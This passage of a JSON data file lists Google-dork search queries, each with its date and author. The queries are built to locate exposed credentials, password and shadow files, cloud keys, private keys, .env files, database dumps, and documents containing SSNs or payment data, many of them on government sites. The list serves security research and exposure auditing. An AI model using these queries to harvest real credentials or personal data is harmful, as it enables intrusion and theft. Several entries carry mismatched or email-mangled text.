Date: 18/11/2021\r\n# Exploit Author: Midhun Mohanan"}, {"dork": "Fwd: intitle:\"Index of /\" intext:\"resource/\"", "description": "# Google Dork: Fwd: intitle:\"Index of /\" intext:\"resource/\"\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Google to wordpress", "description": "# Google Dork: intitle:\"index of\" \"wp-config.php.bak\"\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Aitor Herrero"}, {"dork": "Fwd: intitle:\"atvise - next generation\"", "description": "# Google Dork: Fwd: intitle:\"atvise - next generation\"\r\n# Files Containing Juicy Info\r\n# Date:19/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "site:papaly.com + keyword", "description": "# Google Dork: site:papaly.com + keyword\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Gabriel Tarsia"}, {"dork": "intitle:\"Apache Flink Web Dashboard\"", "description": "# Google Dork: intitle:\"Apache Flink Web Dashboard\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Alfie"}, {"dork": "intitle:\"Index of cd\"", "description": "# Google Dork: intitle:\"index of\" \"man.sh\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"files.pl\"", "description": "# Google Dork: intitle:\"index of\" \"files.pl\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"man.sh\"", "description": "# Google Dork: intitle:\"index of\" \"man.sh\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "allintitle:index of \"/icewarp\"", "description": "# Google Dork: allintitle:index of \"/icewarp\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "allintitle:index of \"/microweber\"", "description": "# Google Dork: allintitle:index of \"/microweber\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "site:gov.* intitle:\"index of\" *Dokuments\"", "description": "# Google Dork: site:gov.* intitle:\"index of\" *Dokuments\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "site:gov.* intitle:\"index of\" *.css", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.css\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" google-api-php-client", "description": "# Google Dork: intitle:\"index of\" google-api-php-client\r\n# Files Containing Juicy Info\r\n# Date:02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" twitter-api-php", "description": "# Google Dork: intitle:\"index of\" twitter-api-php\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" sns-login", "description": "# Google Dork: intitle:\"index of\" sns-login\r\n# Files Containing Juicy Info\r\n# Date:02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" linkedin-api", "description": "# Google Dork: intitle:\"index of\" linkedin-api\r\n# Files Containing Juicy Info\r\n# Date:02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" facebook-api", "description": "# Google Dork: intitle:\"index of\" facebook-api\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" instagram-api", "description": "# Google Dork: intitle:\"index of\" instagram-api\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" zoom-api", "description": "# Google Dork: intitle:\"index of\" zoom-api\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "=?UTF-8?Q?intitle:\"Index_of=E2=80=9D_user=5Fcarts_OR_user_=5Fcart.?=", "description": "# Google Dork: intitle:\"Index of\u201d user_carts OR user _cart.\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" etc/shadow", "description": "# Google Dork: intitle:\"Index of\u201d etc/shadow\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" people.1st", "description": "# Google Dork: intitle:\"Index of\u201d people.1st\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "service._vti_pvt.index", "description": "# Google Dork: service._vti_pvt.index\r\n# Files Containing Juicy Info\r\n# Date:15/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "=?UTF-8?Q?=E2=80=9CIndex_of_/backup=E2=80=9D?=", "description": "# Google Dork: \u201cIndex of /backup\u201d\r\n# Files Containing Juicy Info\r\n# Date:06/15/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "# Description: site:gov.in filetype:xlsx \"password\"", "description": "# Description: site:gov.in filetype:xlsx \"password\"\r\n# Files Containing Juicy Info\r\n# Author : Mangesh Pandhare\r\n# Date : 12/01/2022\r\n# Sensitive directories of SSO id's and passwords"}, {"dork": "site:gov.* intitle:\"index of\" *.doc", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.doc\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "site:gov intitle:\"index of\" *.data", "description": "# Google Dork: site:gov intitle:\"index of\" *.data\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID\r\n\r\n\r\nProof Of Concept:"}, {"dork": "intitle:\"index of\" .ovpn", "description": "# Google Dork: intitle:\"index of\" .ovpn\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2021\r\n# Dork Author: Chandan Sharma"}, {"dork": "site:gov.* intitle:\"index of\" *.pptx", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.pptx\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "site:org.* intitle:\"index of\" * resources", "description": "# Google Dork: site:org.* intitle:\"index of\" * resources\r\n# Files Containing Juicy Info\r\n# Date: 06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "site:gov.* intitle:\"index of\" *.xls", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.xls\r\n# Files Containing Juicy Info\r\n# Date:06/12/2021\r\n# Exploit Author: NAHID"}, {"dork": "intext:\"SQL\" && \"DB\" inurl:\"/runtime/log/\"", "description": "# Google Dork: intext:\"SQL\" && \"DB\" inurl:\"/runtime/log/\"\r\n# Files containing juicy info.\r\n# Date: 08/12/2021\r\n# Exploit Author: Vitor guaxi"}, {"dork": "intitle:\" index of \"/order/status\"", "description": "# Google Dork: intitle:\" index of \"/order/status\"\r\n# Files Containing Juicy Info\r\n# Date: 08/12/2021\r\n# Exploit Author: S Rahul"}, {"dork": "intitle:\"index of\" \"wp-upload\"", "description": "# Google Dork: intitle:\"index of\" \"wp-upload\"\r\n# Files Containing Juicy Info\r\n# Date: 10/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" filetype:sql", "description": "# Google Dork: intitle:\"index of\" filetype:sql\r\n# Files Containing Juicy Info\r\n# Date: 15/12/2021\r\n# Exploit Author: Ract Hack"}, {"dork": "intitle:\"index of\" \" *config.php \"", "description": "# Google Dork: intitle:\"index of\" \" *config.php \"\r\n# Files Containing Juicy Info\r\n# Date: 16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" admin.php \"", "description": "# Google Dork: intitle:\"index of\" \" admin.php \"\r\n# Files Containing Juicy Info\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:index of /backup private", "description": "#Google Dork: intitle:index of /backup private\r\n#Files containing Juicy Info\r\n#Date: 19/12/2021\r\n#Exploit Author: Anshika Bangar"}, {"dork": "intitle:\"index of\" \" index.php?id= \"", "description": "# Google Dork: intitle:\"index of\" \" index.php?id= \"\r\n# Files Containing Juicy Info\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" wp-includes \"", "description": "# Google Dork: intitle:\"index of\" \" wp-includes \"\r\n# Files Containing Juicy Info\r\n# Date:16/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:.com index of apks", "description": "# Google Dork: inurl:.com index of movies\r\n# Pages Containing lot of Juicy Info\r\n# Date: 18 December 2021\r\n# Exploit Author: Ved Kolambkar"}, {"dork": "intitle:index of \"aws/credentials\"", "description": "# Google Dork: intitle:index of \"aws/credentials\"\r\n# Files Containing Juicy Info\r\n# Date: 20/12/2021\r\n# Exploit Author: Yuliia Danylovych"}, {"dork": "inurl:wp-content/plugins/reflex-gallery/", "description": "# Google Dork: inurl:wp-content/plugins/reflex-gallery/\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:com.* intitle:\"index of\" *.admin", "description": "# Google Dork: site:com.* intitle:\"index of\" *.admin\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *.admin.password", "description": "# Google Dork:site:com.* intitle:\"index of\" *.admin.password\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "index of \"fileadmin/php\"", "description": "# Google Dork: \"index of\" \"fileadmin/php\"\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "intitle:\"index of\" \"admin-shell\"", "description": "# Google Dork: intitle:\"index of\" \"admin-shell\"\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:gov.* intitle:\"index of\" *.php", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.php\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:gov.* intitle:\"index of\" *.shell", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.shell\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *shell.php", "description": "# Google Dork: site:com.* intitle:\"index of\" *shell.php\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:gov.* intitle:\"index of\" *.db", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.db\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *.db", "description": "# Google Dork: site:com.* intitle:\"index of\" *.db\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:com.* intitle:\"index of\" *.sql", "description": "# Google Dork: site:com.* intitle:\"index of\" *.sql\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "site:.edu intext:\"index of\" \"shell\"", "description": "# Google Dork: site:.edu intext:\"index of\" \"shell\"\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" :.py", "description": "# Google Dork: \"index of\" :.py\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" :.env", "description": "# Google Dork: \"index of\" :.env\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" filetype:env", "description": "# Google Dork: \"index of\" filetype:env\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" filetype:sql", "description": "# Google Dork: \"index of\" filetype:sql\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "\"index of\" filetype:db", "description": "# Google Dork: \"index of\" filetype:db\r\n# Files Containing Juicy Info\r\n# Date: 24/12/2021\r\n# Exploit Author: Girish B O"}, {"dork": "inurl:*org intitle:\"index of\" \"docker-compose\"", "description": "# Google Dork: inurl:*org intitle:\"index of\" \"docker-compose\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Hrishikesh Patra"}, {"dork": "intext:\"/webdynpro/resources/sap.com/\"", "description": "# Google Dork: intext:\"/webdynpro/resources/sap.com/\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "intitle:\"index of\" \".env\" OR \"pass\"", "description": "# Google Dork: intitle:\"index of\" \".env\" OR \"pass\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "ext:java intext:\"import org.apache.logging.log4j.Logger;\"", "description": "# Google Dork: ext:java intext:\"import org.apache.logging.log4j.Logger;\"\r\n# Files Containing Juicy Info\r\n# Date:16/06/2022\r\n# Exploit Author: Pranav Gajjar"}, {"dork": "intitle:\"index of\" \"java.log\" | \"java.logs\"", "description": "# Google Dork: intitle:\"index of\" \"java.log\" | \"java.logs\"\r\n# Files Containing Juicy Info\r\n# Date: 26/01/2022\r\n# Exploit Author: Mridupawan Bordoloi"}, {"dork": "intitle:index of ./jira-software", "description": "# Description : intitle:index of ./jira-software\r\n# Files Containing Juicy Info\r\n# Date: 28/01/2022\r\n# Exploit Author: Sonu Chaudhary\r\n# This google dork help to find the server that is using Jira-software"}, {"dork": "intext:\"token\" filetype:log \"authenticate\"", "description": "# Google Dork: intext:\"token\" filetype:log \"authenticate\"\r\n# Files Containing Juicy Info\r\n# Date: 04/02/2022\r\n# Exploit Author: Priyanka Iyer"}, {"dork": "intitle:\"index of\" \"printenv.pl", "description": "# Google Dork: intitle:\"index of\" google-api-php-client\r\n# Files Containing Juicy Info\r\n# Date: 05/02/2022\r\n# Exploit Author: Danish Eqbal"}, {"dork": "intitle:\"login\" intext:\"authorized users only\"", "description": "# Google Dork: intitle:\"login\" intext:\"authorized users only\"\r\n# Files Containing Juicy Info\r\n# Date: 24/02/2022\r\n# Exploit Author: Sumant Arora"}, {"dork": "inurl: document/d intext: ssn", "description": "# Google Dork: inurl: document/d intext: ssn\r\n# Files Containing Juicy Info\r\n# Date: 6/2/2022\r\n# Exploit Author: Christian Galvan\r\n# An attacker may be able to discover sensitive files which contain Name, SSN, and other banking information"}, {"dork": "inurl:gitlab \"AWS_SECRET_KEY\"", "description": "# Google Dork: intext: inurl: gitlab \"AWS_SECRET_KEY\"\r\n# Files Containing Juicy Info\r\n# Date: 6/16/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "inurl:/_vti_bin/ ext:asmx", "description": "# Google Dork: inurl:/_vti_bin/ ext:asmx\r\n# Files Containing Juicy Info\r\n# Date:17/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "inurl:/_layouts \"[To Parent Directory]\"", "description": "# Google Dork: inurl:/_layouts \"[To Parent Directory]\"\r\n# Files Containing Juicy Info\r\n# Date:17/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "intitle:\"ManageEngine Desktop Central 10\" AND (inurl:configurations OR inurl:authorization)", "description": "# Google Dork: intitle:\"ManageEngine Desktop Central 10\" AND (inurl:configurations OR inurl:authorization)\r\n# Files Containing Juicy Info\r\n# Date:17/06/2022\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "site:.com intitle:\"index of\" /payments.txt", "description": "# Google Dork: site:.com intitle:\"index of\" /payments.txt\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Exploit Author: Chirag Lundwani"}, {"dork": "intitle:index of \"error_log\"", "description": "# Google Dork: intitle:index of \"error_log\"\r\n# Files Containing Juicy Info\r\n# Date: 19/06/202\r\n# Exploit Author: Mohit veer Kondaveti"}, {"dork": "site:.com intitle:\"index of\" /paypal", "description": "# Google Dork: site:.com intitle:\"index of\" /paypal\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Exploit Author: Chirag Lundwani"}, {"dork": "site:cloudfront.net inurl:d", "description": "# Google Dork: site:cloudfront.net inurl:d\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Author: Juan Christian\r\n# Description: discover AWS CloudFront endpoints."}, {"dork": "site:amazonaws.com inurl:elb.amazonaws.com", "description": "# Google Dork: site:amazonaws.com inurl:elb.amazonaws.com\r\n# Files Containing Juicy Info\r\n# Date: 19/06/2022\r\n# Author: Juan Christian\r\n# Description: discover AWS Elastic Load Balancer (ELB) endpoints."}, {"dork": "intitle:\"index of \"docker-compose.yml\"", "description": "# Google Dork: intitle:\"index of \"docker-compose.yml\"\r\n# Files Containing Juicy Info\r\n# Date:20/06/2022\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of\" \"keystore.jks\"", "description": "# Google Dork: intitle:\"index of\" \"keystore.jks\"\r\n# Files Containing Juicy Info\r\n# Date:22/06/2022\r\n# Exploit Author: Simone Gasparato"}, {"dork": "site:*.com \"index of\" error_logs", "description": "# Google Dork: site:*.com \"index of\" error_logs\r\n# Files Containing Juicy Info\r\n# Date:22/06/2022\r\n# Exploit Author: Chirag Lundwani"}, {"dork": "site:.com intitle:\"index of\" /ipa", "description": "# Google Dork: site:.com intitle:\"index of\" /ipa\r\n# Files Containing Juicy Info\r\n# Date:22/06/2022\r\n# Exploit Author: Simone Gasparato"}, {"dork": "Inquiry about Search Results for intitle:\"index.of\" *S3", "description": "# Google Dork: intitle:\"index.of\" *S3\r\n# Files Containing Juicy Info\r\n# Date:07/03/2023\r\n# Exploit Author: Ritesh Sahu"}, {"dork": "intitle:\"index of\" aws/", "description": "# Google Dork: intitle:\"index of\" aws/\r\n# Files Containing Juicy Info\r\n# Date: 6/22/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "intitle:\"index of\" \"catalina.out\"", "description": "# Google Dork: intitle:\"index of\" \"catalina.out\"\r\n# Files Containing Juicy Info\r\n# Date:23/06/2022\r\n# Exploit Author: Matteo Canato"}, {"dork": "intitle:\"index of\" include/", "description": "# Google Dork: intitle:\"index of\" include/\r\n# Files Containing Juicy Info\r\n# Date: 6/24/2022\r\n# Exploit Author: Rejul Raghu"}, {"dork": "intitle:\"index of\" /gscloud", "description": "# Google Dork: intitle:\"index of\" /gscloud\r\n# Files Containing Juicy Info\r\n# Date:24/06/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "intitle:\"index of\" (\"passenger.*.log\" | \"passenger.log\" | | \"production.log\" )", "description": "# Google Dork: intitle:\"index of\" (\"passenger.*.log\" | \"passenger.log\" | |\"production.log\" )\r\n# Files Containing Juicy Info\r\n# Date: 24/06/2022\r\n# Exploit Author: Matteo Canato"}, {"dork": "index of /wp-admin.zip", "description": "# Google Dork: index of /wp-admin.zip\r\n# Files Containing Juicy Info\r\n# Date:24/06/2022\r\n# Exploit Author: Christian Galvan"}, {"dork": "intitle:\"index of\" \"private_key.pem\"", "description": "# Google Dork: *intitle:\"index of\" \"private_key.pem\"*\r\n#* Files Containing Juicy Info*\r\n# Date: 6/2/2022\r\n# Exploit Author: Hemdeep Gamit"}, {"dork": "intitle:\"Index of /\" inurl:(resume|cv)", "description": "# Google Dork: intitle:\"Index of /\" inurl:(resume|cv)\r\n# Files Containing Juicy Info\r\n# Date: 27/06/2022\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "intitle:\"index of \"cloud-config.yml\"", "description": "# Google Dork: intitle:\"index of \"cloud-config.yml\"\r\n# Files Containing Juicy Info\r\n# Date: 28/06/2022\r\n# Exploit Author: Suman Das"}, {"dork": "intitle: index of \"awstats\"", "description": "# Google Dork: intitle: index of \"awstats\"\r\n# Files Containing Juicy Info\r\n# Date:04/07/2022\r\n# Exploit Author: luis De la Rosa"}, {"dork": "intitle:\"index of\" \"db.py\"", "description": "# Google Dork: intitle:\"index of\" \"db.py\"\r\n# Files Containing Juicy Info\r\n# Date: 06/07/2022\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "Re: intext:\"index of /\" \"server at\"", "description": "Google Dork: intext:\"index of /\" \"server at\"\r\n# Files Containing Juicy Info\r\n# Date:15/07/2022\r\n# Exploit Author: Shehzad Soni"}, {"dork": "inurl:s3.amazonaws.com intitle:\"AWS S3 Explorer\"", "description": "# Google Dork: inurl:s3.amazonaws.com intitle:\"AWS S3 Explorer\"\r\n# Files Containing Juicy Info\r\n# Date: 15/07/2022\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "inurl:/admin ext:config", "description": "Google Dork: inurl:/admin ext:config\r\n# Files Containing Juicy Info\r\n# Date:18/07/2022\r\n# Exploit Author: Ranjeet Jaiswal"}, {"dork": "index of:\"backtrack\" \"hack\" ext:php", "description": "Google Dork: index of:\"backtrack\" \"hack\" ext:php\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \"cookies\" \"php\"", "description": "# Google Dork: intitle:\"index of\" \"cookies\" \"php\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\" TROJANS\" Analysis Report", "description": "# Google Dork: intitle:\" TROJANS\" Analysis Report\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"bugs\" Analysis Report", "description": "# Google Dork: intitle:\"bugs\" Analysis Report\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"httpclient\" \"login\"", "description": "# Google Dork: intext:\"index of\" \"httpclient\" \"login\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"sign up\" \"**\" filetype:php", "description": "# Google Dork: intext:\"sign up\" \"**\" filetype:php\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"repository\"", "description": "# Google Dork: intext:\"index of\" \"repository\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"transaction\"", "description": "# Google Dork: intext:\"index of\" \"transaction\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \".html\"", "description": "# Google Dork: intext:\"index of\" \".html\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"phonepe\" \"wp-content\"", "description": "# Google Dork: intext:\"index of\" \"phonepe\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of smtp\"", "description": "# Google Dork: intitle:\"index of smtp\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext: \"admin\" \"subscribe\" filetype:php", "description": "# Google Dork: intext: \"admin\" \"subscribe\" filetype:php\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intext:\"index of\" \"ipaddress\"", "description": "# Google Dork: intext:\"index of\" \"ipaddress\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of /\" intext:\".env\"", "description": "# Google Dork: intitle:\"index of /\" intext:\".env\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: cybersploit"}, {"dork": "intitle:\"index of\" \"cron.sh\"", "description": "# Google Dork: intitle:\"index of\" \"cron.sh\"\r\n# Files Containing Juicy Info\r\n# Date:25/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "Sensitive Dork Exposing Uploads and Transcation details", "description": "# Google Dork: intext:\"index of\" \"upi\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Chaitanya Redteam"}, {"dork": "intitle:\"index of\" \"setup.sh\"", "description": "# Google Dork: intitle:\"index of\" \"setup.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"after.sh\"", "description": "# Google Dork: intitle:\"index of\" \"after.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"*db.sh\"", "description": "# Google Dork: intitle:\"index of\" \"*db.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"configure.sh\"", "description": "# Google Dork: intitle:\"index of\" \"configure.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"deploy.sh\"", "description": "# Google Dork: intitle:\"index of\" \"deploy.sh\"\r\n# Files Containing Juicy Info\r\n# Date:27/07/2022\r\n# Exploit Author: Yashwant Shastri"}, {"dork": "intitle:\"index of\" \"release.sh\"", "description": "#Google dork : intitle:\"index of\" \"release.sh\"\r\n#Files Containing Juicy Info\r\n#Date: 28/07/2022\r\n#Exploit Author : Amit Kumar\r\n\r\nThis dork shows information about configuration services on server."}, {"dork": "intitle:\"index of\" intext:\"Apache/2.2.3\"", "description": "# Google Dork: intitle:\"index of\" intext:\"Apache/2.2.3\"\r\n# Files Containing Juicy Info\r\n# Date:16/08/2022\r\n# Exploit Author: Wagner Emmanoel de Farias"}, {"dork": "inurl: /wp-includes/uploads", "description": "# Google Dork: inurl: /wp-includes/uploads\r\n# Files Containing Juicy Info\r\n# Date:16/08/2022\r\n# Exploit Author: Rajdip Chavan"}, {"dork": "intitle: \"index of\" intext: human resources", "description": "# Google dork : intitle: \"index of\" intext: human resources\r\n# Category: Files containing Juicy info\r\n# Date: 17/08/2022\r\n# Exploit Author: Mark Ivan David"}, {"dork": "intitle:\"index of\"|\"access_token.json\"", "description": "# Google Dork: intitle:\"index of\"|\"access_token.json\"\r\n# Files Containing Juicy Info\r\n# Date:17/08/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "filetype:reg [HKEY_USERSDEFAULT]", "description": "# Google Dork: filetype:reg [HKEY_USERS\\DEFAULT]n\r\n# Files Containing Juicy Info\r\n# Date:17/08/2022\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "inurl:/sym404/root", "description": "# Google Dork: inurl:/sym404/root\r\n# Files Containing Juicy Info\r\n# Date:18/08/2022\r\n# Exploit Author: Numen Blog"}, {"dork": "intext:\"index of\" \".sql\"", "description": "# Google Dork: intext:\"index of\" \".sql\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Gopalsamy Rajendran"}, {"dork": "intitle:\"index of\" inurl:superadmin", "description": "# Google Dork: intitle:\"index of\" inurl:superadmin\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Mahedi Hassan"}, {"dork": "intitle:\"index of\" inurl:SUID", "description": "# Google Dork: intitle:\"index of\" inurl:SUID\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Mahedi Hassan"}, {"dork": "intitle:\"IIS Windows Server\"", "description": "# Google Dork: intitle:\"IIS Windows Server\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"WAMPSERVER Homepage\"", "description": "# Google Dork: intitle:\"WAMPSERVER Homepage\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: HackerFrenzy"}, {"dork": "intitle:\"index of\" intext:\"Apache/2.2.3\"", "description": "# Google Dork: intitle:\"index of\" intext:\"Apache/2.2.3\"\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Wagner Farias"}, {"dork": "inurl: json beautifier online", "description": "# Google Dork: inurl: json beautifier online\r\n# Files Containing Juicy Info\r\n# Date:19/09/2022\r\n# Exploit Author: Nyein Chan Aung"}, {"dork": "inurl index.php id= site.bd", "description": "# Google Dork: inurl index.php id= site.bd\r\n# Files Containing Juicy Info\r\n# Date:31/01/2023\r\n# Exploit Author: Insha Ahsan Raj"}, {"dork": "intitle:\"index of /database/migrations\"", "description": "# Google Dork: intitle:\"index of /database/migrations\"\r\n# Files Containing Juicy Info\r\n# Date:31/01/2023\r\n# Exploit Author: Shuvrosayar Das"}, {"dork": "intitle:\"Index of /webcam/\"", "description": "# Google Dork: intitle:\"Index of /webcam/\"\r\n# Files Containing Juicy Info\r\n# Date:31/01/2023\r\n# Exploit Author: Shuvrosayar Das"}, {"dork": "inurl: 